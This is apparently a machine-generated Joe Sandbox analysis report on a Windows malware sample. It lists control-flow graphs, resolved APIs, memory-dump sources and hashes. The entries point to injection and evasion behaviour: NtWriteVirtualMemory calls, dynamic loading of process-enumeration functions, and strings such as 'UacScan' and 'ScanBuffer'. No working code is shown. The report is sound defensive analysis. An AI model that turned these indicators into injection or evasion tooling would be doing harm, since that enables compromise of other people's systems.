                          • SysAllocStringLen.OLEAUT32(?,?), ref: 02B84D07
                          • SysFreeString.OLEAUT32(00000000), ref: 02B84D19
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: String$Free$Alloc
                          • String ID:
                          • API String ID: 986138563-0
                          • Opcode ID: 3eeefc98fc1f04147ed25a8ce99a5ae7040bba417c0213ea99b3a05aecf1f654
                          • Instruction ID: b3c61be89990536d5091799c2d160b0c2d3a2110da915f46c909d2db59ea3543
                          • Opcode Fuzzy Hash: 3eeefc98fc1f04147ed25a8ce99a5ae7040bba417c0213ea99b3a05aecf1f654
                          • Instruction Fuzzy Hash: AAE0ECB81162025EEA143F259840B37377AEF81751B1444D9A94CCA150E734C842EE35

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 5863 2b97064-2b970ae call 2b84eec 5866 2b970b0-2b970c2 call 2b8afd0 call 2b83e68 5863->5866 5867 2b970c7-2b970c9 5863->5867 5866->5867 5869 2b970cf-2b970e3 5867->5869 5870 2b97290-2b972b7 5867->5870 5874 2b970e5-2b970ff 5869->5874 5872 2b972b9-2b972c8 5870->5872 5873 2b972e1-2b972e4 5870->5873 5880 2b972ca 5872->5880 5881 2b972cf-2b972df 5872->5881 5875 2b972f5-2b97311 5873->5875 5876 2b972e6-2b972e8 5873->5876 5877 2b97119-2b9711d 5874->5877 5878 2b97101-2b97114 5874->5878 5889 2b97316-2b97318 5875->5889 5876->5875 5882 2b972ea-2b972ee 5876->5882 5884 2b9711f-2b9712e 5877->5884 5885 2b97193-2b97195 5877->5885 5883 2b97287-2b9728a 5878->5883 5880->5881 5881->5875 5882->5875 5886 2b972f0 5882->5886 5883->5870 5883->5874 5887 2b97160-2b97188 call 2b8535c 5884->5887 5888 2b97130-2b9715e call 2b8535c 5884->5888 5890 2b971dc-2b971e0 5885->5890 5891 2b97197-2b9719b 5885->5891 5886->5875 5911 2b9718b-2b9718e 5887->5911 5888->5911 5895 2b9731a-2b9731d call 2b9763c 5889->5895 5896 2b97322-2b97327 5889->5896 5892 2b971e2-2b971ea 5890->5892 5893 2b97255-2b9726c 5890->5893 5898 2b9719d-2b971a7 5891->5898 5899 2b971bf-2b971d7 5891->5899 5901 2b9722a-2b97253 5892->5901 5902 2b971ec-2b97228 call 2b8535c 5892->5902 5900 2b97283 5893->5900 5904 2b9726e-2b97272 5893->5904 5895->5896 5907 2b97329-2b97336 5896->5907 5908 2b97345-2b97357 5896->5908 5898->5899 5909 2b971a9-2b971ba call 2b8ea60 5898->5909 5899->5900 5900->5883 5901->5900 5902->5900 5904->5900 5912 2b97274-2b97280 5904->5912 5913 2b97338-2b9733c call 2b85338 5907->5913 5914 2b97341-2b97343 5907->5914 5918 2b97359-2b97369 SysFreeString 5908->5918 5919 2b9736b 5908->5919 5909->5899 5911->5900 5912->5900 5913->5914 5914->5907 5914->5908 5918->5918 5918->5919
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 02B97362
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID: H
                          • API String ID: 3341692771-2852464175
                          • Opcode ID: cc7b8efecc1a41c0e75ce93187331374d604b861dac0e4e982e71438d6db435f
                          • Instruction ID: 3897a4337b0f9eb21e0ab62e6bcaccd4f86bbe47285dbb80255d5f753c4e5d43
                          • Opcode Fuzzy Hash: cc7b8efecc1a41c0e75ce93187331374d604b861dac0e4e982e71438d6db435f
                          • Instruction Fuzzy Hash: 5AB1E4B4A116089FDB14CF99D880A9DFBF2FF4A314F2485A9E845AB360DB31AC45DF50

                          Control-flow Graph

                          APIs
                          • LoadLibraryA.KERNEL32(00000000,00000000,02B9890B), ref: 02B98858
                            • Part of subcall function 02B98020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B98090,?,?,00000000,?,02B97A06,ntdll,00000000,00000000,02B97A4B,?,?,00000000), ref: 02B9805E
                            • Part of subcall function 02B98020: GetModuleHandleA.KERNELBASE(?), ref: 02B98072
                            • Part of subcall function 02B980C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B98150,?,?,00000000,00000000,?,02B98069,00000000,KernelBASE,00000000,00000000,02B98090), ref: 02B98115
                            • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B9811B
                            • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(?,?), ref: 02B9812D
                            • Part of subcall function 02B97D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B97D74
                          • FreeLibrary.KERNEL32(74BF0000,00000000,02BE1388,Function_000065D8,00000004,02BE1398,02BE1388,05F5E0FF,00000040,02BE139C,74BF0000,00000000,00000000,00000000,00000000,02B9890B), ref: 02B988EB
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: HandleModule$AddressLibraryProc$FreeLoadMemoryVirtualWrite
                          • String ID:
                          • API String ID: 3283153180-0
                          • Opcode ID: bd85bd89ca380081145391118e2c278bbe93d12e23870aed4cf5a1183082fb03
                          • Instruction ID: e17f84f32e0cd69a58b70d613c44507779445a2b0937006cdc1aaac55e2c3e7c
                          • Opcode Fuzzy Hash: bd85bd89ca380081145391118e2c278bbe93d12e23870aed4cf5a1183082fb03
                          • Instruction Fuzzy Hash: 0C115170A50304BFEF10FBA8C802A5E77A9DB46700F6048F4B60DEBA91DA349D10DB54

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 5949 2b8e6e8-2b8e6f5 5950 2b8e6fe-2b8e705 5949->5950 5951 2b8e6f7-2b8e6f9 call 2b8e2ec 5949->5951 5953 2b8e715-2b8e71a 5950->5953 5954 2b8e707-2b8e70e VariantCopy call 2b8dfb8 5950->5954 5951->5950 5956 2b8e71c-2b8e731 call 2b84500 5953->5956 5957 2b8e733-2b8e738 5953->5957 5960 2b8e713 5954->5960 5965 2b8e78e-2b8e792 5956->5965 5958 2b8e73a-2b8e74b 5957->5958 5959 2b8e74d-2b8e752 5957->5959 5958->5965 5963 2b8e764-2b8e76f call 2b92e2c 5959->5963 5964 2b8e754-2b8e762 call 2b8e514 5959->5964 5960->5965 5971 2b8e771-2b8e780 5963->5971 5972 2b8e782-2b8e789 VariantCopy call 2b8dfb8 5963->5972 5964->5965 5971->5965 5972->5965
                          APIs
                          • VariantCopy.OLEAUT32(00000000,00000000), ref: 02B8E709
                            • Part of subcall function 02B8E2EC: VariantClear.OLEAUT32(?), ref: 02B8E2FB
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: Variant$ClearCopy
                          • String ID:
                          • API String ID: 274517740-0
                          • Opcode ID: 17c611584ad7faeb75da1bdde0fef493f94f38fb8c05fe8df8bff5fb1dd233cb
                          • Instruction ID: 7bf1e3ded4864f61c59ca6fb385dc82c66579b4beab6ad006c9d07fb8418dab2
                          • Opcode Fuzzy Hash: 17c611584ad7faeb75da1bdde0fef493f94f38fb8c05fe8df8bff5fb1dd233cb
                          • Instruction Fuzzy Hash: 9211A138B0022097CB25BF28CDC466677EADF9575071494E6FA4E8B256EB30CC41CBA6
                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: InitVariant
                          • String ID:
                          • API String ID: 1927566239-0
                          • Opcode ID: 725dba8cb5c154333cb87e7b6164a9ec58bdf03e4951308d089867005896803d
                          • Instruction ID: 7459cb3b45086b9843a14ecb74db08cf89c1c6687e534473154925d9846e5890
                          • Opcode Fuzzy Hash: 725dba8cb5c154333cb87e7b6164a9ec58bdf03e4951308d089867005896803d
                          • Instruction Fuzzy Hash: 45313E71A04209EFDB51EEA8C984AAE77E8EB0C304F5C45A5F90DD7250E734ED51CBA2
                          APIs
                          • CLSIDFromProgID.OLE32(00000000,?,00000000,02B96D41,?,?,?,00000000), ref: 02B96D21
                            • Part of subcall function 02B84C0C: SysFreeString.OLEAUT32(02B9E950), ref: 02B84C1A
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: FreeFromProgString
                          • String ID:
                          • API String ID: 4225568880-0
                          • Opcode ID: 6dbd5b4a5e2b5b0e51e709b875c5c551933ac6b32bfbbb77beffd082d38bf79c
                          • Instruction ID: a601ffd8b5705a7334021983f46006c7c67abda5e7a717a6fbe6ea5908073057
                          • Opcode Fuzzy Hash: 6dbd5b4a5e2b5b0e51e709b875c5c551933ac6b32bfbbb77beffd082d38bf79c
                          • Instruction Fuzzy Hash: DCE06D71604208BBEB05FBA5DC5196A7BFDEF49B50B5148F1F809D3650EA74AE00D960
                          APIs
                          • GetModuleFileNameA.KERNEL32(02B80000,?,00000105), ref: 02B85832
                            • Part of subcall function 02B85A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B80000,02BAD790), ref: 02B85A94
                            • Part of subcall function 02B85A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B80000,02BAD790), ref: 02B85AB2
                            • Part of subcall function 02B85A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B80000,02BAD790), ref: 02B85AD0
                            • Part of subcall function 02B85A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B85AEE
                            • Part of subcall function 02B85A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B85B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B85B37
                            • Part of subcall function 02B85A78: RegQueryValueExA.ADVAPI32(?,02B85CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B85B7D,?,80000001), ref: 02B85B55
                            • Part of subcall function 02B85A78: RegCloseKey.ADVAPI32(?,02B85B84,00000000,?,?,00000000,02B85B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B85B77
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: Open$FileModuleNameQueryValue$Close
                          • String ID:
                          • API String ID: 2796650324-0
                          • Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                          • Instruction ID: d01aebe5f3ee74a37beebc83f3a2725b4e35dbfb7d38b7a93b1a8557ac7caea0
                          • Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                          • Instruction Fuzzy Hash: D6E06D71A002148BCB20EE5C88C0A5637D8AB08750F4105A5EC58DF34AD370E9508BD0
                          APIs
                          • GetFileAttributesA.KERNEL32(00000000,?,02BA2A49,ScanString,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,ScanBuffer,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,Initialize), ref: 02B87E47
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: d4a25932c1186a40cb6d5613e0fc1b23b5cf5f8b84d23e416c631f776c8215f9
                          • Instruction ID: 5d49e2497d2d98d416ca165942b691ad1d6fbc53eecc5d21f091d2c5875c8d97
                          • Opcode Fuzzy Hash: d4a25932c1186a40cb6d5613e0fc1b23b5cf5f8b84d23e416c631f776c8215f9
                          • Instruction Fuzzy Hash: F7C08CA62022090E5E60B2FC1CC069A42CE8B1423A3B01FE1E53CDA1CADB11D822B410
                          APIs
                          • GetFileAttributesA.KERNEL32(00000000,?,02B9F8CC,ScanString,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,ScanString,02BE137C,02BAAFD8,UacScan,02BE137C,02BAAFD8,UacInitialize), ref: 02B87E23
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 39d99aea2b4b3de8ff8324b5e373e5cbc7456bababb3b7d58f404b20ec88a84a
                          • Instruction ID: b81785ac39ac348f7d99c46f66c62c6545129381dee0b438db767bf1dfaf5fd6
                          • Opcode Fuzzy Hash: 39d99aea2b4b3de8ff8324b5e373e5cbc7456bababb3b7d58f404b20ec88a84a
                          • Instruction Fuzzy Hash: BCC08CA62022000B9A60B1FC0CC444A42CC8B0413E3B40FF5B53CCA2D2DB218812B410
                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID:
                          • API String ID: 3341692771-0
                          • Opcode ID: ceb5ae88bf033e98fc82206b21d1e89e82677d744592aa3ef6d188a356359a2c
                          • Instruction ID: bf73fa03db257a1aa0158afe27383b0d9b97acc24aab623a56ed7b980423f056
                          • Opcode Fuzzy Hash: ceb5ae88bf033e98fc82206b21d1e89e82677d744592aa3ef6d188a356359a2c
                          • Instruction Fuzzy Hash: 93C012B261133547EB216A9C9CC075662DCDB052A5F1400E1D50CD7240E3609C00CB65
                          APIs
                          • timeSetEvent.WINMM(00002710,00000000,02BABB44,00000000,00000001), ref: 02BABB60
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: Eventtime
                          • String ID:
                          • API String ID: 2982266575-0
                          • Opcode ID: 5581899b360c0b2fa1bf38089f0f260130f075321db0f21791f8002c2abe3144
                          • Instruction ID: 715282e57a9da7592a63dde5486cb961699fab0960b2df505f1ce444621d609f
                          • Opcode Fuzzy Hash: 5581899b360c0b2fa1bf38089f0f260130f075321db0f21791f8002c2abe3144
                          • Instruction Fuzzy Hash: B1C092F17D63003EF62466A81CD2F63668DE704B04FA00492BB05EE2D1D5E248604A74
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02B81A03,?,02B82000), ref: 02B815E2
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 2e4cb4b6c0ed46af09a0c25fc07f42822163f76d9c6c49259ef018cbed540c16
                          • Instruction ID: 57c5026d241bf3d611f125d77d24ea41958ac3ff2b670853cbdfab64455f21bc
                          • Opcode Fuzzy Hash: 2e4cb4b6c0ed46af09a0c25fc07f42822163f76d9c6c49259ef018cbed540c16
                          • Instruction Fuzzy Hash: FFF0E7F0B523004BEB85DF7999543856BE6E789384F1485B9E609DF298E77194128B10
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02B82000), ref: 02B816A4
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: a30b3dc5a3773f4adbfd84338ab007605d176a9a0c9a565d81af4ba797a2604b
                          • Instruction ID: e4d9663a327a22b40cec395272e1fac4fe0bad7d1e0b1fd9b1caa6fe5d5e81fb
                          • Opcode Fuzzy Hash: a30b3dc5a3773f4adbfd84338ab007605d176a9a0c9a565d81af4ba797a2604b
                          • Instruction Fuzzy Hash: FFF0B4B2B41795ABDB20AF5E9C81782BBA4FB00354F054579F98CAB340D7B0A811CFD4
                          APIs
                          • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02B81FE4), ref: 02B81704
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: FreeVirtual
                          • String ID:
                          • API String ID: 1263568516-0
                          • Opcode ID: 61aa7f50624fcea4168b25860724eff9e2ba59ef9e2f2416c619c1348532b689
                          • Instruction ID: 2bad6eab8ab04fbb28b43f7469c63964cf9dcbdac5cb67d275f366816ee9fc15
                          • Opcode Fuzzy Hash: 61aa7f50624fcea4168b25860724eff9e2ba59ef9e2f2416c619c1348532b689
                          • Instruction Fuzzy Hash: 10E086B9311301AFD7106E7D5D407126BD8EB44654F1448B9F54DDB241D2A0E811CB60
                          APIs
                          • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02B9ABE3,?,?,02B9AC75,00000000,02B9AD51), ref: 02B9A970
                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02B9A988
                          • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02B9A99A
                          • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02B9A9AC
                          • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02B9A9BE
                          • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02B9A9D0
                          • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02B9A9E2
                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02B9A9F4
                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02B9AA06
                          • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02B9AA18
                          • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02B9AA2A
                          • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02B9AA3C
                          • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02B9AA4E
                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02B9AA60
                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02B9AA72
                          • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02B9AA84
                          • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02B9AA96
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
